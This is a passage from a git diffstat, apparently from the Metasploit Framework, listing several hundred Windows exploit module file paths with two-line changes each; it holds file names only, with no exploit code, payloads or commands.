2 +- modules/exploits/windows/browser/ms05_054_onload.rb | 2 +- modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb | 2 +- modules/exploits/windows/browser/ms06_013_createtextrange.rb | 2 +- modules/exploits/windows/browser/ms06_055_vml_method.rb | 2 +- modules/exploits/windows/browser/ms06_057_webview_setslice.rb | 2 +- modules/exploits/windows/browser/ms06_067_keyframe.rb | 2 +- modules/exploits/windows/browser/ms06_071_xml_core.rb | 2 +- .../windows/browser/ms07_017_ani_loadimage_chunksize.rb | 2 +- modules/exploits/windows/browser/ms08_041_snapshotviewer.rb | 2 +- modules/exploits/windows/browser/ms08_053_mediaencoder.rb | 2 +- .../exploits/windows/browser/ms08_070_visual_studio_msmask.rb | 2 +- modules/exploits/windows/browser/ms08_078_xml_corruption.rb | 2 +- modules/exploits/windows/browser/ms09_002_memory_corruption.rb | 2 +- modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb | 2 +- modules/exploits/windows/browser/ms09_043_owc_msdso.rb | 2 +- modules/exploits/windows/browser/ms09_072_style_object.rb | 2 +- modules/exploits/windows/browser/ms10_002_aurora.rb | 2 +- modules/exploits/windows/browser/ms10_002_ie_object.rb | 2 +- modules/exploits/windows/browser/ms10_018_ie_behaviors.rb | 2 +- modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb | 2 +- .../exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb | 2 +- modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb | 2 +- .../exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb | 2 +- .../windows/browser/ms10_046_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 2 +- modules/exploits/windows/browser/ms11_003_ie_css_import.rb | 2 +- .../exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb | 2 +- modules/exploits/windows/browser/ms11_081_option.rb | 2 +- modules/exploits/windows/browser/ms11_093_ole32.rb | 2 +- modules/exploits/windows/browser/ms12_004_midi.rb | 2 +- modules/exploits/windows/browser/ms12_037_ie_colspan.rb | 2 +- modules/exploits/windows/browser/ms12_037_same_id.rb | 2 +- modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb | 2 +- .../windows/browser/ms13_022_silverlight_script_object.rb | 2 +- modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb | 2 +- modules/exploits/windows/browser/ms13_055_canchor.rb | 2 +- modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb | 2 +- modules/exploits/windows/browser/ms13_069_caret.rb | 2 +- modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb | 2 +- .../exploits/windows/browser/ms13_090_cardspacesigninhelper.rb | 2 +- modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb | 2 +- modules/exploits/windows/browser/ms14_012_textrange.rb | 2 +- modules/exploits/windows/browser/msvidctl_mpeg2.rb | 2 +- modules/exploits/windows/browser/mswhale_checkforupdates.rb | 2 +- .../exploits/windows/browser/msxml_get_definition_code_exec.rb | 2 +- .../windows/browser/nctaudiofile2_setformatlikesample.rb | 2 +- modules/exploits/windows/browser/nis2004_antispam.rb | 2 +- modules/exploits/windows/browser/nis2004_get.rb | 2 +- modules/exploits/windows/browser/notes_handler_cmdinject.rb | 2 +- .../exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb | 2 +- modules/exploits/windows/browser/novelliprint_callbackurl.rb | 2 +- modules/exploits/windows/browser/novelliprint_datetime.rb | 2 +- modules/exploits/windows/browser/novelliprint_executerequest.rb | 2 +- .../exploits/windows/browser/novelliprint_executerequest_dbg.rb | 2 +- .../exploits/windows/browser/novelliprint_getdriversettings.rb | 2 +- .../windows/browser/novelliprint_getdriversettings_2.rb | 2 +- modules/exploits/windows/browser/novelliprint_target_frame.rb | 2 +- modules/exploits/windows/browser/ntr_activex_check_bof.rb | 2 +- modules/exploits/windows/browser/ntr_activex_stopmodule.rb | 2 +- .../exploits/windows/browser/oracle_autovue_setmarkupmode.rb | 2 +- modules/exploits/windows/browser/oracle_dc_submittoexpress.rb | 2 +- .../windows/browser/oracle_webcenter_checkoutandopen.rb | 2 +- modules/exploits/windows/browser/orbit_connecting.rb | 2 +- modules/exploits/windows/browser/ovftool_format_string.rb | 2 +- modules/exploits/windows/browser/pcvue_func.rb | 2 +- modules/exploits/windows/browser/persits_xupload_traversal.rb | 2 +- modules/exploits/windows/browser/quickr_qp2_bof.rb | 2 +- modules/exploits/windows/browser/real_arcade_installerdlg.rb | 2 +- modules/exploits/windows/browser/realplayer_cdda_uri.rb | 2 +- modules/exploits/windows/browser/realplayer_console.rb | 2 +- modules/exploits/windows/browser/realplayer_import.rb | 2 +- modules/exploits/windows/browser/realplayer_qcp.rb | 2 +- modules/exploits/windows/browser/realplayer_smil.rb | 2 +- modules/exploits/windows/browser/roxio_cineplayer.rb | 2 +- modules/exploits/windows/browser/safari_xslt_output.rb | 2 +- .../windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb | 2 +- .../exploits/windows/browser/sapgui_saveviewtosessionfile.rb | 2 +- .../exploits/windows/browser/siemens_solid_edge_selistctrlx.rb | 2 +- modules/exploits/windows/browser/softartisans_getdrivename.rb | 2 +- modules/exploits/windows/browser/sonicwall_addrouteentry.rb | 2 +- .../browser/symantec_altirisdeployment_downloadandinstall.rb | 2 +- .../windows/browser/symantec_altirisdeployment_runcmd.rb | 2 +- modules/exploits/windows/browser/symantec_appstream_unsafe.rb | 2 +- .../exploits/windows/browser/symantec_backupexec_pvcalendar.rb | 2 +- .../browser/symantec_consoleutilities_browseandsavefile.rb | 2 +- .../exploits/windows/browser/synactis_connecttosynactis_bof.rb | 2 +- .../exploits/windows/browser/systemrequirementslab_unsafe.rb | 2 +- modules/exploits/windows/browser/teechart_pro.rb | 2 +- modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb | 2 +- modules/exploits/windows/browser/trendmicro_extsetowner.rb | 2 +- modules/exploits/windows/browser/trendmicro_officescan.rb | 2 +- modules/exploits/windows/browser/tumbleweed_filetransfer.rb | 2 +- modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb | 2 +- modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb | 2 +- modules/exploits/windows/browser/ultraoffice_httpupload.rb | 2 +- modules/exploits/windows/browser/verypdf_pdfview.rb | 2 +- modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb | 2 +- modules/exploits/windows/browser/vlc_amv.rb | 2 +- modules/exploits/windows/browser/vlc_mms_bof.rb | 2 +- modules/exploits/windows/browser/webdav_dll_hijacker.rb | 2 +- modules/exploits/windows/browser/webex_ucf_newobject.rb | 2 +- .../windows/browser/wellintech_kingscada_kxclientdownload.rb | 2 +- modules/exploits/windows/browser/winamp_playlist_unc.rb | 2 +- modules/exploits/windows/browser/winamp_ultravox.rb | 2 +- modules/exploits/windows/browser/windvd7_applicationtype.rb | 2 +- modules/exploits/windows/browser/winzip_fileview.rb | 2 +- modules/exploits/windows/browser/wmi_admintools.rb | 2 +- .../exploits/windows/browser/x360_video_player_set_text_bof.rb | 2 +- modules/exploits/windows/browser/xmplay_asx.rb | 2 +- modules/exploits/windows/browser/yahoomessenger_fvcom.rb | 2 +- modules/exploits/windows/browser/yahoomessenger_server.rb | 2 +- .../exploits/windows/browser/zenturiprogramchecker_unsafe.rb | 2 +- modules/exploits/windows/browser/zenworks_helplauncher_exec.rb | 2 +- modules/exploits/windows/dcerpc/ms03_026_dcom.rb | 2 +- modules/exploits/windows/dcerpc/ms05_017_msmq.rb | 2 +- modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb | 2 +- modules/exploits/windows/dcerpc/ms07_065_msmq.rb | 2 +- .../exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb | 2 +- modules/exploits/windows/email/ms10_045_outlook_ref_only.rb | 2 +- modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb | 2 +- modules/exploits/windows/emc/alphastor_agent.rb | 2 +- modules/exploits/windows/emc/alphastor_device_manager_exec.rb | 2 +- modules/exploits/windows/emc/networker_format_string.rb | 2 +- modules/exploits/windows/emc/replication_manager_exec.rb | 2 +- modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb | 2 +- modules/exploits/windows/fileformat/abbs_amp_lst.rb | 2 +- modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb | 2 +- modules/exploits/windows/fileformat/acdsee_xpm.rb | 2 +- modules/exploits/windows/fileformat/actfax_import_users_bof.rb | 2 +- modules/exploits/windows/fileformat/activepdf_webgrabber.rb | 2 +- modules/exploits/windows/fileformat/adobe_collectemailinfo.rb | 2 +- modules/exploits/windows/fileformat/adobe_cooltype_sing.rb | 2 +- modules/exploits/windows/fileformat/adobe_flashplayer_button.rb | 2 +- .../windows/fileformat/adobe_flashplayer_newfunction.rb | 2 +- .../windows/fileformat/adobe_flatedecode_predictor02.rb | 2 +- modules/exploits/windows/fileformat/adobe_geticon.rb | 2 +- .../exploits/windows/fileformat/adobe_illustrator_v14_eps.rb | 2 +- modules/exploits/windows/fileformat/adobe_jbig2decode.rb | 2 +- modules/exploits/windows/fileformat/adobe_libtiff.rb | 2 +- modules/exploits/windows/fileformat/adobe_media_newplayer.rb | 2 +- modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 2 +- .../exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb | 2 +- modules/exploits/windows/fileformat/adobe_reader_u3d.rb | 2 +- modules/exploits/windows/fileformat/adobe_toolbutton.rb | 2 +- modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb | 2 +- modules/exploits/windows/fileformat/adobe_utilprintf.rb | 2 +- modules/exploits/windows/fileformat/allplayer_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/altap_salamander_pdb.rb | 2 +- modules/exploits/windows/fileformat/aol_desktop_linktag.rb | 2 +- modules/exploits/windows/fileformat/aol_phobos_bof.rb | 2 +- modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb | 2 +- modules/exploits/windows/fileformat/apple_quicktime_texml.rb | 2 +- modules/exploits/windows/fileformat/audio_coder_m3u.rb | 2 +- modules/exploits/windows/fileformat/audio_wkstn_pls.rb | 2 +- modules/exploits/windows/fileformat/audiotran_pls.rb | 2 +- modules/exploits/windows/fileformat/audiotran_pls_1424.rb | 2 +- modules/exploits/windows/fileformat/aviosoft_plf_buf.rb | 2 +- modules/exploits/windows/fileformat/bacnet_csv.rb | 2 +- modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb | 2 +- modules/exploits/windows/fileformat/blazedvd_plf.rb | 2 +- modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb | 2 +- modules/exploits/windows/fileformat/bsplayer_m3u.rb | 2 +- modules/exploits/windows/fileformat/ca_cab.rb | 2 +- modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb | 2 +- modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb | 2 +- modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb | 2 +- modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb | 2 +- modules/exploits/windows/fileformat/csound_getnum_bof.rb | 2 +- modules/exploits/windows/fileformat/cutezip_bof.rb | 2 +- modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb | 2 +- modules/exploits/windows/fileformat/cytel_studio_cy3.rb | 2 +- modules/exploits/windows/fileformat/deepburner_path.rb | 2 +- modules/exploits/windows/fileformat/destinymediaplayer16.rb | 2 +- modules/exploits/windows/fileformat/digital_music_pad_pls.rb | 2 +- modules/exploits/windows/fileformat/djstudio_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/djvu_imageurl.rb | 2 +- modules/exploits/windows/fileformat/dvdx_plf_bof.rb | 2 +- modules/exploits/windows/fileformat/easycdda_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/emc_appextender_keyworks.rb | 2 +- modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb | 2 +- .../windows/fileformat/erdas_er_viewer_rf_report_error.rb | 2 +- .../exploits/windows/fileformat/esignal_styletemplate_bof.rb | 2 +- modules/exploits/windows/fileformat/etrust_pestscan.rb | 2 +- modules/exploits/windows/fileformat/ezip_wizard_bof.rb | 2 +- modules/exploits/windows/fileformat/fatplayer_wav.rb | 2 +- modules/exploits/windows/fileformat/fdm_torrent.rb | 2 +- modules/exploits/windows/fileformat/feeddemon_opml.rb | 2 +- modules/exploits/windows/fileformat/foxit_reader_filewrite.rb | 2 +- modules/exploits/windows/fileformat/foxit_reader_launch.rb | 2 +- modules/exploits/windows/fileformat/foxit_title_bof.rb | 2 +- modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb | 2 +- modules/exploits/windows/fileformat/galan_fileformat_bof.rb | 2 +- modules/exploits/windows/fileformat/gsm_sim.rb | 2 +- modules/exploits/windows/fileformat/gta_samp.rb | 2 +- modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb | 2 +- modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb | 2 +- modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb | 2 +- modules/exploits/windows/fileformat/homm3_h3m.rb | 2 +- modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb | 2 +- .../exploits/windows/fileformat/ibm_forms_viewer_fontname.rb | 2 +- modules/exploits/windows/fileformat/ibm_pcm_ws.rb | 2 +- modules/exploits/windows/fileformat/icofx_bof.rb | 2 +- modules/exploits/windows/fileformat/ideal_migration_ipj.rb | 2 +- modules/exploits/windows/fileformat/iftp_schedule_bof.rb | 2 +- modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb | 2 +- modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb | 2 +- modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb | 2 +- modules/exploits/windows/fileformat/lattice_pac_bof.rb | 2 +- modules/exploits/windows/fileformat/lotusnotes_lzh.rb | 2 +- modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb | 2 +- .../windows/fileformat/mcafee_hercules_deletesnapshot.rb | 2 +- modules/exploits/windows/fileformat/mcafee_showreport_exec.rb | 2 +- modules/exploits/windows/fileformat/mediacoder_m3u.rb | 2 +- modules/exploits/windows/fileformat/mediajukebox.rb | 2 +- modules/exploits/windows/fileformat/microp_mppl.rb | 2 +- modules/exploits/windows/fileformat/millenium_mp3_pls.rb | 2 +- modules/exploits/windows/fileformat/mini_stream_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb | 2 +- modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb | 2 +- modules/exploits/windows/fileformat/moxa_mediadbplayback.rb | 2 +- modules/exploits/windows/fileformat/mplayer_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/mplayer_sami_bof.rb | 2 +- .../exploits/windows/fileformat/ms09_067_excel_featheader.rb | 2 +- modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb | 2 +- modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb | 2 +- .../exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb | 2 +- .../windows/fileformat/ms11_006_createsizeddibsection.rb | 2 +- modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb | 2 +- modules/exploits/windows/fileformat/ms12_005.rb | 2 +- modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb | 2 +- modules/exploits/windows/fileformat/ms13_071_theme.rb | 2 +- modules/exploits/windows/fileformat/ms14_017_rtf.rb | 2 +- modules/exploits/windows/fileformat/ms14_060_sandworm.rb | 2 +- modules/exploits/windows/fileformat/ms14_064_packager_python.rb | 2 +- .../windows/fileformat/ms14_064_packager_run_as_admin.rb | 2 +- .../windows/fileformat/ms15_020_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb | 2 +- modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb | 2 +- modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +- .../exploits/windows/fileformat/msworks_wkspictureinterface.rb | 2 +- modules/exploits/windows/fileformat/mymp3player_m3u.rb | 2 +- modules/exploits/windows/fileformat/netop.rb | 2 +- .../exploits/windows/fileformat/nuance_pdf_launch_overflow.rb | 2 +- modules/exploits/windows/fileformat/openoffice_ole.rb | 2 +- .../exploits/windows/fileformat/orbit_download_failed_bof.rb | 2 +- modules/exploits/windows/fileformat/orbital_viewer_orb.rb | 2 +- modules/exploits/windows/fileformat/ovf_format_string.rb | 2 +- modules/exploits/windows/fileformat/proshow_cellimage_bof.rb | 2 +- modules/exploits/windows/fileformat/proshow_load_bof.rb | 2 +- modules/exploits/windows/fileformat/publishit_pui.rb | 2 +- modules/exploits/windows/fileformat/real_networks_netzip_bof.rb | 2 +- .../exploits/windows/fileformat/real_player_url_property_bof.rb | 2 +- .../exploits/windows/fileformat/realplayer_ver_attribute_bof.rb | 2 +- .../exploits/windows/fileformat/safenet_softremote_groupname.rb | 2 +- modules/exploits/windows/fileformat/sascam_get.rb | 2 +- modules/exploits/windows/fileformat/scadaphone_zip.rb | 2 +- .../exploits/windows/fileformat/shadow_stream_recorder_bof.rb | 2 +- modules/exploits/windows/fileformat/somplplayer_m3u.rb | 2 +- .../exploits/windows/fileformat/subtitle_processor_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb | 2 +- .../exploits/windows/fileformat/total_video_player_ini_bof.rb | 2 +- modules/exploits/windows/fileformat/tugzip.rb | 2 +- modules/exploits/windows/fileformat/ultraiso_ccd.rb | 2 +- modules/exploits/windows/fileformat/ultraiso_cue.rb | 2 +- modules/exploits/windows/fileformat/ursoft_w32dasm.rb | 2 +- modules/exploits/windows/fileformat/varicad_dwb.rb | 2 +- modules/exploits/windows/fileformat/videocharge_studio.rb | 2 +- modules/exploits/windows/fileformat/videolan_tivo.rb | 2 +- modules/exploits/windows/fileformat/videospirit_visprj.rb | 2 +- modules/exploits/windows/fileformat/visio_dxf_bof.rb | 2 +- modules/exploits/windows/fileformat/visiwave_vwr_type.rb | 2 +- modules/exploits/windows/fileformat/vlc_modplug_s3m.rb | 2 +- modules/exploits/windows/fileformat/vlc_realtext.rb | 2 +- modules/exploits/windows/fileformat/vlc_smb_uri.rb | 2 +- modules/exploits/windows/fileformat/vlc_webm.rb | 2 +- modules/exploits/windows/fileformat/vuplayer_cue.rb | 2 +- modules/exploits/windows/fileformat/vuplayer_m3u.rb | 2 +- modules/exploits/windows/fileformat/watermark_master.rb | 2 +- modules/exploits/windows/fileformat/winamp_maki_bof.rb | 2 +- modules/exploits/windows/fileformat/winrar_name_spoofing.rb | 2 +- modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb | 2 +- modules/exploits/windows/fileformat/wireshark_packet_dect.rb | 2 +- modules/exploits/windows/fileformat/wm_downloader_m3u.rb | 2 +- modules/exploits/windows/fileformat/xenorate_xpl_bof.rb | 2 +- modules/exploits/windows/fileformat/xion_m3u_sehbof.rb | 2 +- modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb | 2 +- modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb | 2 +- modules/exploits/windows/firewall/blackice_pam_icq.rb | 2 +- modules/exploits/windows/firewall/kerio_auth.rb | 2 +- modules/exploits/windows/ftp/32bitftp_list_reply.rb | 2 +- modules/exploits/windows/ftp/3cdaemon_ftp_user.rb | 2 +- modules/exploits/windows/ftp/aasync_list_reply.rb | 2 +- modules/exploits/windows/ftp/ability_server_stor.rb | 2 +- modules/exploits/windows/ftp/absolute_ftp_list_bof.rb | 2 +- modules/exploits/windows/ftp/cesarftp_mkd.rb | 2 +- modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb | 2 +- modules/exploits/windows/ftp/dreamftp_format.rb | 2 +- modules/exploits/windows/ftp/easyfilesharing_pass.rb | 2 +- modules/exploits/windows/ftp/easyftp_cwd_fixret.rb | 2 +- modules/exploits/windows/ftp/easyftp_list_fixret.rb | 2 +- modules/exploits/windows/ftp/easyftp_mkd_fixret.rb | 2 +- modules/exploits/windows/ftp/filecopa_list_overflow.rb | 2 +- modules/exploits/windows/ftp/filewrangler_list_reply.rb | 2 +- modules/exploits/windows/ftp/freefloatftp_wbem.rb | 2 +- modules/exploits/windows/ftp/freeftpd_pass.rb | 2 +- modules/exploits/windows/ftp/freeftpd_user.rb | 2 +- modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb | 2 +- modules/exploits/windows/ftp/ftppad_list_reply.rb | 2 +- modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb | 2 +- modules/exploits/windows/ftp/ftpsynch_list_reply.rb | 2 +- modules/exploits/windows/ftp/gekkomgr_list_reply.rb | 2 +- modules/exploits/windows/ftp/globalscapeftp_input.rb | 2 +- modules/exploits/windows/ftp/goldenftp_pass_bof.rb | 2 +- modules/exploits/windows/ftp/httpdx_tolog_format.rb | 2 +- modules/exploits/windows/ftp/kmftp_utility_cwd.rb | 2 +- modules/exploits/windows/ftp/leapftp_list_reply.rb | 2 +- modules/exploits/windows/ftp/leapftp_pasv_reply.rb | 2 +- modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb | 2 +- modules/exploits/windows/ftp/netterm_netftpd_user.rb | 2 +- modules/exploits/windows/ftp/odin_list_reply.rb | 2 +- modules/exploits/windows/ftp/open_ftpd_wbem.rb | 2 +- modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb | 2 +- modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb | 2 +- modules/exploits/windows/ftp/pcman_stor.rb | 2 +- modules/exploits/windows/ftp/proftp_banner.rb | 2 +- modules/exploits/windows/ftp/quickshare_traversal_write.rb | 2 +- modules/exploits/windows/ftp/ricoh_dl_bof.rb | 2 +- modules/exploits/windows/ftp/sami_ftpd_user.rb | 2 +- modules/exploits/windows/ftp/sasser_ftpd_port.rb | 2 +- modules/exploits/windows/ftp/scriptftp_list.rb | 2 +- modules/exploits/windows/ftp/seagull_list_reply.rb | 2 +- modules/exploits/windows/ftp/servu_chmod.rb | 2 +- modules/exploits/windows/ftp/servu_mdtm.rb | 2 +- modules/exploits/windows/ftp/slimftpd_list_concat.rb | 2 +- modules/exploits/windows/ftp/trellian_client_pasv.rb | 2 +- modules/exploits/windows/ftp/turboftp_port.rb | 2 +- modules/exploits/windows/ftp/vermillion_ftpd_port.rb | 2 +- modules/exploits/windows/ftp/warftpd_165_pass.rb | 2 +- modules/exploits/windows/ftp/warftpd_165_user.rb | 2 +- modules/exploits/windows/ftp/wftpd_size.rb | 2 +- modules/exploits/windows/ftp/wing_ftp_admin_exec.rb | 2 +- modules/exploits/windows/ftp/wsftp_server_503_mkd.rb | 2 +- modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb | 2 +- modules/exploits/windows/ftp/xftp_client_pwd.rb | 2 +- modules/exploits/windows/ftp/xlink_client.rb | 2 +- modules/exploits/windows/ftp/xlink_server.rb | 2 +- modules/exploits/windows/games/mohaa_getinfo.rb | 2 +- modules/exploits/windows/games/racer_503beta5.rb | 2 +- modules/exploits/windows/games/ut2004_secure.rb | 2 +- modules/exploits/windows/http/adobe_robohelper_authbypass.rb | 2 +- modules/exploits/windows/http/altn_securitygateway.rb | 2 +- modules/exploits/windows/http/altn_webadmin.rb | 2 +- modules/exploits/windows/http/amlibweb_webquerydll_app.rb | 2 +- modules/exploits/windows/http/apache_chunked.rb | 2 +- modules/exploits/windows/http/apache_mod_rewrite_ldap.rb | 2 +- modules/exploits/windows/http/apache_modjk_overflow.rb | 2 +- modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb | 2 +- modules/exploits/windows/http/badblue_ext_overflow.rb | 2 +- modules/exploits/windows/http/badblue_passthru.rb | 2 +- modules/exploits/windows/http/bea_weblogic_jsessionid.rb | 2 +- modules/exploits/windows/http/bea_weblogic_post_bof.rb | 2 +- modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb | 2 +- modules/exploits/windows/http/belkin_bulldog.rb | 2 +- modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb | 2 +- modules/exploits/windows/http/ca_igateway_debug.rb | 2 +- .../exploits/windows/http/ca_totaldefense_regeneratereports.rb | 2 +- modules/exploits/windows/http/cogent_datahub_command.rb | 2 +- .../exploits/windows/http/cogent_datahub_request_headers_bof.rb | 2 +- modules/exploits/windows/http/coldfusion_fckeditor.rb | 2 +- modules/exploits/windows/http/cyclope_ess_sqli.rb | 2 +- modules/exploits/windows/http/desktopcentral_file_upload.rb | 2 +- .../exploits/windows/http/desktopcentral_statusupdate_upload.rb | 2 +- modules/exploits/windows/http/easyftp_list.rb | 2 +- modules/exploits/windows/http/edirectory_host.rb | 2 +- modules/exploits/windows/http/edirectory_imonitor.rb | 2 +- modules/exploits/windows/http/efs_easychatserver_username.rb | 2 +- modules/exploits/windows/http/efs_fmws_userid_bof.rb | 2 +- modules/exploits/windows/http/ektron_xslt_exec.rb | 2 +- modules/exploits/windows/http/ericom_access_now_bof.rb | 2 +- modules/exploits/windows/http/ezserver_http.rb | 2 +- modules/exploits/windows/http/fdm_auth_header.rb | 2 +- modules/exploits/windows/http/generic_http_dll_injection.rb | 2 +- modules/exploits/windows/http/hp_autopass_license_traversal.rb | 2 +- modules/exploits/windows/http/hp_imc_bims_upload.rb | 2 +- modules/exploits/windows/http/hp_imc_mibfileupload.rb | 2 +- modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb | 2 +- modules/exploits/windows/http/hp_mpa_job_acct.rb | 2 +- modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb | 2 +- modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb | 2 +- modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb | 2 +- modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 2 +- modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 2 +- modules/exploits/windows/http/hp_nnm_openview5.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovas.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebhelp.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb | 2 +- modules/exploits/windows/http/hp_nnm_snmp.rb | 2 +- modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb | 2 +- modules/exploits/windows/http/hp_nnm_toolbar_01.rb | 2 +- modules/exploits/windows/http/hp_nnm_toolbar_02.rb | 2 +- modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb | 2 +- modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb | 2 +- modules/exploits/windows/http/hp_openview_insight_backdoor.rb | 2 +- .../exploits/windows/http/hp_pcm_snac_update_certificates.rb | 2 +- modules/exploits/windows/http/hp_pcm_snac_update_domain.rb | 2 +- modules/exploits/windows/http/hp_power_manager_filename.rb | 2 +- modules/exploits/windows/http/hp_power_manager_login.rb | 2 +- modules/exploits/windows/http/hp_sitescope_dns_tool.rb | 2 +- modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb | 2 +- modules/exploits/windows/http/httpdx_handlepeer.rb | 2 +- modules/exploits/windows/http/httpdx_tolog_format.rb | 2 +- modules/exploits/windows/http/ia_webmail.rb | 2 +- modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb | 2 +- modules/exploits/windows/http/ibm_tpmfosd_overflow.rb | 2 +- modules/exploits/windows/http/ibm_tsm_cad_header.rb | 2 +- modules/exploits/windows/http/icecast_header.rb | 2 +- modules/exploits/windows/http/integard_password_bof.rb | 2 +- modules/exploits/windows/http/intersystems_cache.rb | 2 +- modules/exploits/windows/http/intrasrv_bof.rb | 2 +- modules/exploits/windows/http/ipswitch_wug_maincfgret.rb | 2 +- modules/exploits/windows/http/jira_collector_traversal.rb | 2 +- modules/exploits/windows/http/kaseya_uploader.rb | 2 +- modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb | 2 +- modules/exploits/windows/http/kolibri_http.rb | 2 +- .../exploits/windows/http/landesk_thinkmanagement_upload_asp.rb | 2 +- modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb | 2 +- modules/exploits/windows/http/mailenable_auth_header.rb | 2 +- modules/exploits/windows/http/manage_engine_opmanager_rce.rb | 2 +- modules/exploits/windows/http/manageengine_apps_mngr.rb | 2 +- .../exploits/windows/http/manageengine_connectionid_write.rb | 2 +- modules/exploits/windows/http/maxdb_webdbm_database.rb | 2 +- modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb | 2 +- modules/exploits/windows/http/mcafee_epolicy_source.rb | 2 +- modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb | 2 +- modules/exploits/windows/http/minishare_get_overflow.rb | 2 +- modules/exploits/windows/http/miniweb_upload_wbem.rb | 2 +- modules/exploits/windows/http/navicopa_get_overflow.rb | 2 +- modules/exploits/windows/http/netdecision_http_bof.rb | 2 +- modules/exploits/windows/http/novell_imanager_upload.rb | 2 +- modules/exploits/windows/http/novell_mdm_lfi.rb | 2 +- modules/exploits/windows/http/novell_messenger_acceptlang.rb | 2 +- modules/exploits/windows/http/nowsms.rb | 2 +- modules/exploits/windows/http/oracle9i_xdb_pass.rb | 2 +- modules/exploits/windows/http/oracle_beehive_evaluation.rb | 2 +- 